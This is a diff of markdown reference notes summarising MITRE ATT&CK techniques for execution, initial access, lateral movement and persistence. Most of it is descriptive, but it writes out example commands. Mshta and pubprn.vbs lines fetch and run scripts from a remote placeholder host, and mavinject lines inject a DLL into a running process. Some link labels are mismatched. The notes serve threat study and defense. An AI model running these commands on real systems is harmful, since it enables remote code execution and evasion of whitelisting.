* Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via Spearphishing Attachment campaigns 23 or executed as part of multi-stage malware.4 Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.
-------------------------------
## Dynamic Data Exchange
* [Dynamic Data Exchange - ATT&CK](https://attack.mitre.org/wiki/Technique/T1173)
* Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
* Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.123
* Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands45, directly or through embedded files6, and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.7 DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.
-------------------------------
## Execution through API
* [Execution through API - ATT&CK](https://attack.mitre.org/wiki/Technique/T1106)
* Adversary tools may directly use the Windows application programming interface (API) to execute binaries.
@ -92,12 +120,11 @@
## Execution through Module Load
-------------------------------
## Execution through Module Load
* [Execution through Module Load - ATT&CK](https://attack.mitre.org/wiki/Technique/T1129)
* The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API.Wikipedia Windows Library Files
* The module loader can load DLLs:
* The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API.1
* The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
@ -107,17 +134,33 @@
-------------------------------
## Exploitation for Client Execution
* [Exploitation for Client Execution - ATT&CK](https://attack.mitre.org/wiki/Technique/T1203)
* Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
* **Browser-based Exploitation**
* Web browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
* **Office Applications**
* Common office and productivity applications such as Microsoft Office are also targeted through Spearphishing Attachment, Spearphishing Link, and Spearphishing via Service. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
* **Common Third-party Applications**
* Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
## Graphical User Interface
-------------------------------
## Graphical User Interface
* [Graphical User Interface - ATT&CK](https://attack.mitre.org/wiki/Technique/T1061)
* Cause a binary or script to execute based on interacting with the file through a graphical user interface (GUI) or in an interactive remote session such as Remote Desktop Protocol.
## InstallUtil
-------------------------------
## InstallUtil
* [InstallUtil - ATT&CK](https://attack.mitre.org/wiki/Technique/T1118)
* InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. InstallUtil is located in the .NET directory on a Windows system: `C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe`. InstallUtil.exe is digitally signed by Microsoft. Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].
@ -128,18 +171,52 @@
-------------------------------
## LSASS Driver
* [LSASS Driver - ATT&CK](https://attack.mitre.org/wiki/Technique/T1177)
* The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
* Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., DLL Side-Loading or DLL Search Order Hijacking), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.
## Launchctl
-------------------------------
## Launchctl
* [Launchctl - ATT&CK](https://attack.mitre.org/wiki/Technique/T1152)
* Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made Sofacy Komplex Trojan. Running a command from launchctl is as simple as `launchctl submit -l <labelName> -- /Path/to/thing/to/execute "arg" "arg" "arg"`. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges. Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.
## Powershell
-------------------------------
## Local Job Scheduling
* [Local Job Scheduling - ATT&CK](https://attack.mitre.org/wiki/Technique/T1168)
* On Linux and Apple systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, at, and launchd.3 Unlike Scheduled Task on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).
* **cron**
* System-wide cron jobs are installed by modifying `/etc/crontab` file, `/etc/cron.d/` directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files.3 This works on Mac and Linux systems.
* Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.
* **at**
* The at program is another means on Linux-based systems, including Mac, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.
* **launchd**
* Each launchd job is described by a different configuration property list (plist) file similar to Launch Daemon or Launch Agent, except there is an additional key called StartCalendarInterval with a dictionary of time values. This only works on macOS and OS X.
-------------------------------
## Mshta
* [Mshta - ATT&CK](https://attack.mitre.org/wiki/Technique/T1170)
* Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension `.hta`. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.
* Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code34567
* Files may be executed by mshta.exe through an inline script: `mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))`
* They may also be executed directly from URLs: `mshta http[:]//webserver/payload[.]hta`
* Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.
-------------------------------
## Powershell
* [PowerShell](https://attack.mitre.org/wiki/Technique/T1086)
* PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.TechNet PowerShell Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.
* PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
@ -156,24 +233,9 @@
## Process Hollowing
-------------------------------
* [Process Hollowing - ATT&CK](https://attack.mitre.org/wiki/Technique/T1093)
* Process hollowing occurs when a process is created in a suspended state and the process's memory is replaced with the code of a second program so that the second program runs instead of the original program. Windows and process monitoring tools believe the original process is running, whereas the actual program running is different. Hollowing Process hollowing may be used similarly to DLL Injection to evade defenses and detection analysis of malicious process execution by launching adversary-controlled code under the context of a legitimate process.
#### Windows
* [Process Hollowing - John Leitch - PDF](http://www.autosectools.com/process-hollowing.pdf)
* [Process-Hollowing](https://github.com/m0n0ph1/Process-Hollowing)
* Great explanation of Process Hollowing
## Regsvcs/Regasm
-------------------------------
## Regsvcs/Regasm
* [Regsvcs/Regasm - ATT&CK](https://attack.mitre.org/wiki/Technique/T1121)
* Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.MSDN RegsvcsMSDN Regasm Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: `[ComRegisterFunction]` or `[ComUnregisterFunction]` respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute.SubTee GitHub All The Things Application Whitelisting Bypass
@ -188,8 +250,9 @@
## Regsvr32
-------------------------------
## Regsvr32
* [Regsvr32 - ATT&CK](https://attack.mitre.org/wiki/Technique/T1117)
* Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.Microsoft Regsvr32
* Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.
@ -207,8 +270,8 @@
## Rundll32
-------------------------------
## Rundll32
* [Rundll32 - ATT&CK](https://attack.mitre.org/wiki/Technique/T1085)
* The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.
@ -219,8 +282,8 @@
## Scheduled Tasks
-------------------------------
## Scheduled Tasks
* [Scheduled Tasks - ATT&CK](https://attack.mitre.org/wiki/Technique/T1053)
* Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. The account used to create the task must be in the Administrators group on the local system. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on.TechNet Task Scheduler Security An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.
@ -242,8 +305,9 @@
## Scripting
-------------------------------
## Scripting
* [Scripting - ATT&CK](https://attack.mitre.org/wiki/Technique/T1064)
* Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts. Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. MetasploitMetasploit, VeilVeil, and PowerSploitPowersploit are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell.Alperovitch 2014
@ -258,8 +322,9 @@
## Service Execution
-------------------------------
## Service Execution
* [Service Execution - ATT&CK](https://attack.mitre.org/wiki/Technique/T1035)
* Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.
@ -273,8 +338,39 @@
## Source
-------------------------------
## Signed Binary Proxy Execution
* [Signed Binary Proxy Execution - ATT&CK](https://attack.mitre.org/wiki/Technique/T1218)
* Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.
* **Mavinject.exe**
* Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process.1
* `"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>`
* `C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>`
* **SyncAppvPublishingServer.exe**
* SyncAppvPublishingServer.exe can be used to run powershell scripts without executing powershell.exe.
* Several others binaries exist that may be used to perform similar behavior.
-------------------------------
## Signed Binary Proxy Execution
* [Signed Script Proxy Execution - ATT&CK](https://attack.mitre.org/wiki/Technique/T1216)
* Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
* PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site.
* Example command: `cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png`
* There are several other signed scripts that may be used in a similar manner.
-------------------------------
## Source
* [Source - ATT&CK](https://attack.mitre.org/wiki/Technique/T1153)
* The source command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways `source /path/to/filename [arguments]` or . `/path/to/filename [arguments]`. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment. Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.
@ -285,8 +381,9 @@
## Spaces after Filename
-------------------------------
## Spaces after Filename
* [Spaces after Filename - ATT&CK](https://attack.mitre.org/wiki/Technique/T1151)
* Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed.
@ -297,9 +394,9 @@
## Third-Party Software
-------------------------------
Third-Party Software
## Third-Party Software
* [Third-Party Software - ATT&CK](https://attack.mitre.org/wiki/Technique/T1072)
* Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.
* Adversaries may gain access to and use third-party application deployment systems installed within an enterprise network. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
@ -309,8 +406,8 @@ Third-Party Software
## Trap
-------------------------------
## Trap
* [Trap - ATT&CK](https://attack.mitre.org/wiki/Technique/T1154)
* The `trap` command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format `trap` 'command list' signals where "command list" will be executed when "signals" are received.
@ -329,8 +426,9 @@ Third-Party Software
## Trusted Developer Utilites
------------------------------
## Trusted Developer Utilites
Trusted Developer Utilities
* [Trusted Developer Utilities -* ATT&CK](https://attack.mitre.org/wiki/Technique/T1127)
* There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.
@ -372,8 +470,22 @@ Trusted Developer Utilities
## Windows Management Instrumentation
-------------------------------
## User Execution
* [User Execution - ATT&CK](https://attack.mitre.org/wiki/Technique/T1204)
* An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via Spearphishing Attachment with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via Spearphishing Link that leads to exploitation of a browser or application vulnerability via Exploitation for Client Execution. While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.
-------------------------------
## Windows Management Instrumentation
* [Windows Management Instrumentation - ATT&CK](https://attack.mitre.org/wiki/Technique/T1047)
* Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB)Wikipedia SMB and Remote Procedure Call Service (RPCS)TechNet RPC for remote access. RPCS operates over port 135.MSDN WMI An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement.FireEye WMI 2015
@ -401,8 +513,9 @@ Trusted Developer Utilities
## Windows Remote Management
-------------------------------
## Windows Remote Management
* [Windows Remote Management - ATT&CK](https://attack.mitre.org/wiki/Technique/T1028)
* Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).Microsoft WinRM It may be called with the winrm command or by any number of programs such as PowerShell.Jacobsen 2014


+ 76
- 0
Draft/ATT&CK-Stuff/Initial_Access.md View File

@ -0,0 +1,76 @@
# Initial Access
* [MITRE ATT&CK - Initial Access](https://attack.mitre.org/wiki/Initial_Access)
* The initial access tactic represents the vectors adversaries use to gain an initial foothold within a network.
-------------------------------
## Drive-by-Compromise
* [Drive-by-Compromise - ATT&CK](https://attack.mitre.org/wiki/Technique/T1189)
* A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation.
-------------------------------
## Exploit Public-Facing Application
* [Exploit Public-Facing Application - ATT&CK](https://attack.mitre.org/wiki/Technique/T1190)
* The use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services. Depending on the flaw being exploited this may include Exploitation for Defense Evasion.
-------------------------------
## Hardware Additions
* [Drive-by-Compromise - ATT&CK](https://attack.mitre.org/wiki/Technique/T1200)
* Computer accessories, computers or networking hardware may be introduced into a system as a vector to gain execution. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping, man-in-the middle encryption breaking, keystroke injection, kernel memory reading via DMA, adding new wireless access to an existing network, and others.
-------------------------------
## Replication Through Removable Media
* [Replication Through Removable Media - ATT&CK](https://attack.mitre.org/wiki/Technique/T1091)
* Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
-------------------------------
## Spearphishing Link
* [Spearphishing Link - ATT&CK](https://attack.mitre.org/wiki/Technique/T1189)
* Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attachment malicious files to the email itself, to avoid defenses that may inspect email attachments.
-------------------------------
## Spearphishing via Service
* [Drive-by-Compromise - ATT&CK](https://attack.mitre.org/wiki/Technique/T1194)
* Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.
* All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.
* A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.
-------------------------------
## Supply Chain Compromise
* [Supply Chain Compromise - ATT&CK](https://attack.mitre.org/wiki/Technique/T1195)
* Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including:
* Manipulation of development tools
* Manipulation of a development environment
* Manipulation of source code repositories (public or private)
* Manipulation of software update/distribution mechanisms
* Compromised/infected system images (multiple cases of removable media infected at the factory)
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction
-------------------------------
## Trusted Relationship
* [Trusted Relationship - ATT&CK](https://attack.mitre.org/wiki/Technique/T1199)
* Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
* Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, Valid Accounts used by the other party for access to internal network systems may be compromised and used.
-------------------------------
## Valid Accounts
* [Valid Accounts - ATT&CK](https://attack.mitre.org/wiki/Technique/T1078)
* Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access.
* Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
* Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful.
* The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise

+ 42
- 11
Draft/ATT&CK-Stuff/Lateral Movement.md View File

@ -18,8 +18,11 @@
## Application Deployment Software
-------------------------------
## Application Deployment Software
Application Deployment Software
* [Application Deployment Software - ATT&CK](https://attack.mitre.org/wiki/Technique/T1017)
* Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
@ -28,8 +31,31 @@ Application Deployment Software
* [Owning One To Rule Them All - Defcon20](https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf)
## Exploitation of Vulnerability
-------------------------------
## Distributed Component Object Model
* [Distributed Component Object Model - ATT&CK](https://attack.mitre.org/wiki/Technique/T1175)
* Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM)1 beyond a local computer using remote procedure call (RPC) technology. COM is a component of the Windows application programming interface (API) that enables interaction between software objects. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).
* Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. By default, only Administrators may remotely activate and launch COM objects through DCOM.
* Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications5 as well as other Windows objects that contain insecure methods.67 DCOM can also execute macros in existing documents and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application9, bypassing the need for a malicious document.
-------------------------------
## Exploitation of Remote Services
* [Exploitation of Remote Services - ATT&CK](https://attack.mitre.org/wiki/Technique/T1210)
* Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
* An adversary may need to determine if the remote system is in a vulnerable state, which may be done through Network Service Scanning or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
* There are several well-known vulnerabilities that exist in common services such as SMB and RDP as well as applications that may be used within internal networks such as MySQL3 and web server services.
* Depending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.
-------------------------------
## Exploitation of Vulnerability
* [Exploitation of Vulnerability - ATT&CK](https://attack.mitre.org/wiki/Technique/T1068)
* Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Exploiting software vulnerabilities may allow adversaries to run a command or binary on a remote system for lateral movement, escalate a current process to a higher privilege level, or bypass security mechanisms. Exploits may also allow an adversary access to privileged accounts and credentials. One example of this is MS14-068, which can be used to forge Kerberos tickets using domain user permissions.Technet MS14-068ADSecurity Detecting Forged Tickets
@ -157,20 +183,24 @@ Application Deployment Software
## Shared Webroot
-------------------------------
## Shared Webroot
* [Shared Webroot - ATT&CK](https://attack.mitre.org/wiki/Technique/T1051)
* Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured. This mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited.
-------------------------------
## SSH Hijacking
* [SSH Hijacking - ATT*&CK](https://attack.mitre.org/wiki/Technique/T1184)
* Secure Shell (SSH) is a standard means of remote access on Linux and Mac systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
* In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial. Compromising the SSH agent also provides access to intercept SSH credentials.
* SSH Hijacking differs from use of Remote Services because it injects into an existing SSH session rather than creating a new session using Valid Accounts.
## Taint Shared Content
-------------------------------
## Taint Shared Content
* [Taint Shared Content - ATT&CK](https://attack.mitre.org/wiki/Technique/T1080)
* Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
* [The Backdoor Factory](https://github.com/secretsquirrel/the-backdoor-factory)
@ -178,8 +208,11 @@ Application Deployment Software
## Third-Party Software
-------------------------------
## Third-Party Software
* [Third-party Software - ATT&CK](https://attack.mitre.org/wiki/Technique/T1072)
* Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.
* Adversaries may gain access to and use third-party application deployment systems installed within an enterprise network. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
@ -189,9 +222,8 @@ Application Deployment Software
## Windows Admin Shares
-------------------------------
## Windows Admin Shares
* [Windows Admin Shares - ATT&CK](https://attack.mitre.org/wiki/Technique/T1077)
* Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$.
* Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB)Wikipedia SMB to interact with systems using remote procedure calls (RPCs),TechNet RPC transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.Microsoft Admin Shares
@ -204,9 +236,8 @@ Application Deployment Software
## Windows Remote Management
-------------------------------
## Windows Remote Management
* [Windows Remote Management - ATT&CK](https://attack.mitre.org/wiki/Technique/T1028)
* Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).Microsoft WinRM It may be called with the winrm command or by any number of programs such as PowerShell.Jacobsen 2014


+ 121
- 33
Draft/ATT&CK-Stuff/Persistence.md View File

@ -44,6 +44,11 @@
* [Privilege Escalation via "Sticky" Keys](http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html)
-------------------------------
## AppCert DLLs
* [AppCert DLLs - ATT&CK](https://attack.mitre.org/wiki/Technique/T1182)
@ -56,6 +61,10 @@
* Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
-------------------------------
## AppInit DLLs
* [AppInit DLLs - ATT&CK](https://attack.mitre.org/wiki/Technique/T1103)
@ -108,6 +117,15 @@
-------------------------------
## BITS Jobs
* [BITS Jobs - ATT&CK](https://attack.mitre.org/wiki/Technique/T1197)
